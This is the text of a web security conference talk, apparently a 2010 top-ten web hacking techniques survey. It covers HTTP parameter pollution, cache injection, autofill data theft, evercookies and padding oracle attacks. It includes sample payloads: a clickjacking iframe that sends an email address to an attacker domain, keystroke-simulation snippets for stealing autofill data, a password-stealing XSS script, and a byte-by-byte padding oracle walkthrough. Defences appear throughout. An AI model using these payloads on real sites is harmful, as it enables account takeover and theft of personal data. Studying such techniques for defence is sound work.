11. HTTP Parameter Pollution (HPP) - Top Ten 2009
If an attacker submit multiple input parameters (query string, post data, cookies,
etc.) of the same name, the application may react in unexpected ways and open
up new avenues of server-side and client-side exploitation.
GET /foo?par1=val1&par1=val2 HTTP/1.1
User-Agent: Mozilla/5.0
Host: Host
Accept: */*
POST /foo HTTP/1.1
User-Agent: Mozilla/5.0
Host: Host
Accept: */*
par1=val1&par1=val2
POST /index.aspx?par1=val1&par1=val2 HTTP/1.1
User-Agent: Mozilla/5.0
Host: Host
Cookie: par1=val3; par1=val4
Content-Length: 19
par1=val5&par1=val6
11
16. Simple parameter injection
void private executeBackendRequest(HTTPRequest request) {
String amount=request.getParameter("amount");
String beneficiary=request.getParameter("recipient");
HttpRequest("http://backend.com/servlet/actions","POST",
"action=transfer&amount="+amount+"&recipient="+beneficiary);
}
Malicious URL:
http://target.com/page?amount=1000&recipient=Jeremiah%26action%3dwithdraw
Translates to:
action=transfer&amount=1000&recipient=Jeremiah&action=withdraw
It is possible the attack could work if proper authorization controls are not in place and
the application uses the last occurrence of the action parameter (IBM Lotus Domino,
PHP / Apache, etc.)
16
17. Example Scenario
http://example/updateEmail.jsp
Client-Side
<form method="POST">
<input type="text" name="email" value=””></input>
<input type="hidden" name=”csrf-token” value="a0a0a0a0a0a"/>
</form>
Server-Side
if (req.parameter("email").isSet() && req.parameter("csrf-token").isValid()) {
// process the form and update the email ID
} else {
// display an empty form to the user (CSRF token included)
}
17
18. Bringing it all together
<iframe src=”http://example/updateEmail.jsp?email=evil@attacker.com”>
HTTP request via user submitted form via Clickjacking. The form was not filled out by
the victim, meaning the email parameter in the POST body is blank. Now the
QueryString contains the attacker entered value for the ‘email’ parameter.
POST /updateEmail.jsp?email=evil@attackermail.com
HTTP/1.1
Host: www.example.com
email=&csrf-token=a0a0a0a0a0
When the server side JSP code calls req.parameter("email"), the value that is returned
is the one in the QueryString (HPP first occurrence) and not the POST body. Since
this value can be controlled by the attacker, he can trick the victim in to updating his
account with the attacker’s mail ID.
18
19. Attacking HTTPS with Cache Injection
4
No matter what type of encryption is used to defend a
network, sooner or later the password, key, or certificate
needs to be stored. If an attacker is able to tamper with
the storage mechanism, even the strongest encryption
mechanism can fail. The researchers demonstrated how
to attack storage mechanisms by tampering with SSL
session and break into Wifi networks using WPA. They
also showed how to exploit SSL warning inconsistencies
and caching mechanisms to trick the user into accepting a
bad certs and steal their username & password.
Elie Bursztein (@ELIE), Baptiste Gourdin
(@bapt1ste), Dan Boneh
http://www.youtube.com/watch?v=bt0Qh9c59_c
http://elie.im/talks/bad-memories
19
20. RFC1918 Caching Security - (Top Ten 2009)
Public Wifi
HTTP
Internet
Airpwn
Victims
coffee shops, airplanes,
corp guest networks Bad Guy
• Victim(s) located on a RFC 1918 network with a Bad Guy
• Bad Guy may take the opportunity to read victim’s Web mail, steal creds, etc.
• Bad Guy man-in-the-middles HTTP (Airpwn) to inject IFRAMEs to RFC-1918 IPs
• MitM IFRAMEs to include JavaScript malware (BeEF). Or ...
• Inject JavaScript malware into popular Web widget URLs. (Ad servers, counters, etc.)
• Cache content in the browser for a really long time, beyond current session!
http://www.bindshell.net/tools/beef/
http://airpwn.sourceforge.net/Airpwn.html
21. Situation
• 43% of the Alexa top 100,000 use external javascript libraries
• Injecting a malicious javascript library into the browser cache
allows the attacker to compromise a website protected by SSL
• The malicious library stays in the cache until the user clears it.
Moving to a “safe” location doesn’t help
21
22. Impact
• One poisoned injection leads to multiple breaches
• Multiples websites share the same external library such as
Google Analytics
• Injecting a malicious version of one of these shared libraries
allows the attacker to target all the websites that use it
22
23. Browser Defense -- sort of
• The only defense against cache injection is the SSL warning
displayed by the browser when a bad certificate is supplied
• Corner cases that allows an attacker to alter the way SSL
certificate warning are displayed
• These alterations make caching attack efficient as the user is
more likely to click through the tampered warning
23
24. Video Demo
• The following demos show how caching injection attacks
works against Internet Explorer 8 and Firefox 3.6
• These demos were done in real time against real sites with
their real certificates
24
25. Hacking Auto-Complete
3
This research encompasses a set of techniques where a
malicious website may surreptitiously obtain their visitors
names, job title, workplace, physical address, telephone
number, email addresses, usernames, passwords, search
terms, social security numbers, credit card numbers, and
on and on by simulating JavaScript keystroke events in
Web browsers HTML form auto-complete / autofill
functionality.
Jeremiah Grossman (@jeremiahg)
http://jeremiahgrossman.blogspot.com/2010/08/breaking-browsers-hacking-auto-complete.html
http://jeremiahgrossman.blogspot.com/2010/07/i-know-who-your-name-where-you-work-and.html
http://jeremiahgrossman.blogspot.com/2010/09/safari-autofill-hack-lives.html
http://jeremiahgrossman.blogspot.com/2010/07/in-firefox-we-cant-read-auto-complete.html
25
26. I want to know your name, who
you work for, where you live, your
email address, etc.
Right at the moment you a visit a website. Even if you’ve never
been there before, let alone entered information.
26
28. Address Card Autofill works even when
you’ve NEVER entered personal data on
ANY WEBSITE.
28
29. Demo
var event = document.createEvent('TextEvent');
event.initTextEvent('textInput', 1, 1, null, char);
input.value = ""; Step 1) Dynamically create
input.selectionStart = 0; input fields with the pre-set
input.selectionEnd = 0; attribute names.
input.focus();
input.dispatchEvent(event);! Step 2) Cycle through the
! alphabet initiating text events
setTimeout(function() { until a form value populates.
if (input.value.length > 1) {
// capture the value; Step 3) Profit! -- Steal data
} with JavaScript.
}, 500); *transparency is even more fun!*
Safari
v4 / v5
29
31. AutoComplete: User-supplied form values are shared across
different websites by attribute “name”. For example, email
addresses entered into a field on website A populates the autofill for
the same field name on website B, C, D, etc.
<input type="text" name="email">
31
32. DEMO - Down, Down, Enter
// hit down arrow an incrementing number of times.
// separate with time to allow the GUI to keep pace
for (var i = 1; i <= downs; i++) {
time += 30; // time padding
keyStroke(this, 40, time); // down button
}
! !
time += 15; // time padding
keyStroke(this, 13, time); // enter button
// initiate keystroke on a given object
function keyStroke(obj, code, t) {
//create new event and fire
var e = document.createEventObject();
e.keyCode = code;
setTimeout(function() {obj.fireEvent("onkeydown", e); }, t);
} // end keyStroke
Security Basis, and an Internet Explorer data stealer
http://webreflection.blogspot.com/2008/09/security-basis-and-internet-explorer.html
Andrea Giammarchi, Ajaxian Staff
32
33. Search terms
Credit card numbers and CCVs
Aliases
Contact information
Answers to secret questions
Usernames
Email addresses
...
33
34. AutoComplete is NOT enabled by default, but Internet
Explorer asks if the user if they would like to enable
the feature after filling out a non-password form.
34
36. Saving Passwords
Many Web Browsers have “password managers,” which provide
a convenient way to save passwords on a “per website” basis.
<form method="post" action="/">
E-Mail: <input type="text" name="email"><br />
Password: <input type="password" name="pass"><br />
<input type="submit" value="Login">
</form>
36
37. If a website with a saved password is vulnerable to XSS, the
payload can dynamically create login forms, which executes the
browser’s password auto-complete feature. Since the payload is
on the same domain the username / password can be stolen.
function stealCreds() {
var string = "E-Mail: " + document.getElementById("u").value;
string += "nPassword: " + document.getElementById("p").value;
return string;
}
document.write('<form method="post" action="/">E-Mail: <input
id="u" type="text" name="email" value=""><br>Password: <input
id="p" type="password" name="password" value=""></form>');
setTimeout('alert(stealCreds())', 2000);
* * DEMO
37
38. What to do...
Disable Auto-Complete in the Web browser
Remove persistent data
(History, Form Data, Cookies, LocalStorage, etc.)
NoScript (Firefox Extension), 1Password, etc.
<form autocomplete="off">
<input type="text" autocomplete="off" />
38
39. Evercookie
2
Evercookie is a javascript API available that produces
extremely persistent cookies in a browser. Its goal is to
identify a client even after they've removed standard
cookies, Flash cookies (Local Shared Objects or LSOs),
and others. Evercookie accomplishes this by storing the
cookie data in several types of storage mechanisms that
are available on the local browser. Additionally, if evercookie
has found the user has removed any of the types of cookies
in question, it recreates them using each mechanism
available.
Samy Kamkar (@samykamkar)
http://samy.pl/evercookie/
39
41. Evercookies
1) Standard HTTP Cookies 6) Internet Explorer userData storage
2) Flash Cookies (LSOs) 7) Storing cookies in Web cache
3) Silverlight Isolated Storage 8) Storing cookies in HTTP ETags
4) Storing cookies in RGB values of auto- 9) HTML5 Session Storage
generated, force-cached PNGs using
HTML5 Canvas tag to read pixels 10) HTML5 Local Storage
(cookies) back out
11) HTML5 Global Storage
5) Storing cookies in Web History
12) HTML5 Database Storage via SQLite
6)window.name caching
41
42. The API
• Persistent cookies via Javascript API
• Recreates after deletion
• Combines different storage mechanisms
• Easy to use!
var ec = new evercookie();
ec.set(“uniqueid”, “31337”); // set uniqueid = 31337
// get our evercookie data back
ec.get(“uniqueid”, function(val) { alert (“ID is “ + val) } );
42
43. PNGs Cache
Cookie stored in RGB values of auto-generated, force-cached PNGs
using HTML5 Canvas Tag to read pixels back out
Pixel 0x0 = 0x4f5741 OWA
Pixel 0x1 = 0x535000 SP0
43
44. Killing Evercookies (Video)
1) Open a new tab, then close all other windows and tabs.
2) Delete Silverlight Isolated Storage
• Go to http://www.silverlight.net/
• Right click the Silverlight application (any app will do)
• Silverlight Preferences > Application Storage > Delete all...
• Click "Yes"
• * Optionally disable "Enable application storage"
3) Delete Flash Local Shared Objects (LSO)
• Go got the Flash "Website Storage Settings panel"
• Click "Delete all sites"
• Click "Confirm"
4) Clear Browsing Data
• - Wrench > Tools > Clear Browsing Data...
• - Select all options
• - Clear data from this period: Everything
• - Click "Clear Browsing data"
http://singe.za.net/blog/archives/1014-Killing-the-Evercookie.html
http://jeremiahgrossman.blogspot.com/2010/10/killing-evercookie-google-chrome-wo.html
44
45. Other Protections
• Nevercookie - The evercookie killer
Firefox plugin to extend Firefox’s Private Browsing
http://nevercookie.anonymizer.com/
• Use a virtual machine. (On your neighbor’s WiFi Network)
45
46. Other Worries...
• System/browser timing
• GPU timing via plugins/accelerators (w/Flash)
• MAC address accessible via Java or ActiveX!
46
47. 'Padding Oracle' Crypto Attack
1
In 2002 a powerful side-channel attack, ‘padding
oracle’ (NOT THE DATABASE!), was described targeting
AES CBC-mode encryption with PKCS#5 padding. If
there is an oracle which on receipt of a ciphertext,
decrypts it and replies whether the padding is correct,
shows how to use that oracle to decrypt data without
knowing the encryption key. The new techniques allow
attackers to use a ‘padding oracle’ to decrypt and encrypt
messages of any length without knowing the secret key
and exploit popular web development frameworks
including ASP.NET.
Juliano Rizzo (@julianor)
Thai Duong (@thaidn)
http://usenix.org/events/woot10/tech/full_papers/Rizzo.pdf
http://netifera.com/research/
http://www.gdssecurity.com/l/b/2010/09/14/automated-padding-oracle-attacks-with-padbuster/
http://www.youtube.com/watch?v=yghiC_U2RaM
http://threatpost.com/en_us/blogs/padding-oracle-crypto-attack-affects-millions-aspnet-apps-091310
47
49. Padding Oracle Attack Basics
An application uses a query string parameter to pass an encrypted username,
company id, and role id of a user. The parameter is encrypted using CBC mode,
and each value uses a unique initialization vector (IV) pre-pended to the ciphertext.
When the application is sent an encrypted value, it responds in one of three ways:
1)Valid ciphertext, properly padded and valid data (200 OK)
2)Invalid ciphertext, improper padding (500 Internal Server Error)
3)Valid ciphertext, properly padded and invalid data (200 OK - custom error)
User’s name (BRIAN), company id (12), and role id (2). The value, in plaintext, can
be represented as BRIAN;12;2;
http://site/app.jsp?UID=7B216A634951170FF851D6CC68FC9537858795A28ED4AAC6
49
52. First block of ciphertext pre-pended with an IV of all NULL values.
Request: http://site/app.jsp?UID=0000000000000000F851D6CC68FC9537
Response: 500 - Internal Server Error
52
53. Last byte of the initialization vector incremented by one.
Request: http://app/home.jsp?UID=0000000000000001F851D6CC68FC9537
Response: 500 - Internal Server Error
53
54. Incrementing the last byte in the IV up to FF will produce a valid padding sequence for a
single byte of padding (0×01). Only one value will produce the correct padding byte and
have different response than the other 255.
Request: http://site/app?UID=000000000000003CF851D6CC68FC9537
Response: 200 OK
If [Intermediary Byte] ^ 0x3C == 0×01,
then [Intermediary Byte] == 0x3C ^ 0×01,
so [Intermediary Byte] == 0x3D
54
55. To crack the 7th byte, the 7th and 8th byte must equal 0×02 for valid padding. Since we
already know that the last intermediary value byte is 0x3D, we can update the 8th IV byte
to 0x3F (which will produce 0×02) and then focus on brute forcing the 7th byte (starting
with 0×00 and working our way up through 0xFF).
55
56. Work backwards through the entire block until every byte of the intermediary value is
cracked and uncovering the decrypted value one byte at a time. The final byte is cracked
using an IV that produces an entire block of just padding (0×08).
"The first stage of the attack takes a few thousand requests, but
once it succeeds and the attacker gets the secret keys, it's totally
stealthy.The cryptographic knowledge required is very basic."
- Julian Rizzo
56
57. <VIDEO>
"It turns out that the vulnerability in ASP.NET is the most critical amongst
other frameworks. In short, it totally destroys ASP.NET security,"
-Thai Duong
57
58. Impact & Prevention
Vulnerable Frameworks
ASP.Net, CAPTCHAs, JavaServer Faces, OWASP ESAPI,
Ruby On Rails, etc.
Prevention
•Encrypt-then-MAC (sign) and validate-then-decrypt
•Patch!
58
59. What have we learned?
• Encryption attacks took the top spot for the 2nd year in a row.
• Web Browser privacy? Web browser security? Not so much.
• “Top Ten” attacks from previous years are being improved.
• Several attack techniques from previous years are now
actively being used maliciously in the wild.
59
60. Thank You...
• Sponsors: OWASP, Black Hat, WhiteHat
Security
• Panel of Experts: Ed Skoudis, Giorgio
Maone, Caleb Sima, Chris Wysopal, Jeff
Willams, Charlie Miller, Dan Kaminsky,
Steven Christey (Mitre), and Arian Evans
• All the security researchers for their
contributions
• Everyone in the Web Application Security
community who assisted
Blog: http://jeremiahgrossman.blogspot.com/
Twitter: http://twitter.com/jeremiahg
Email: jeremiah@whitehatsec.com
60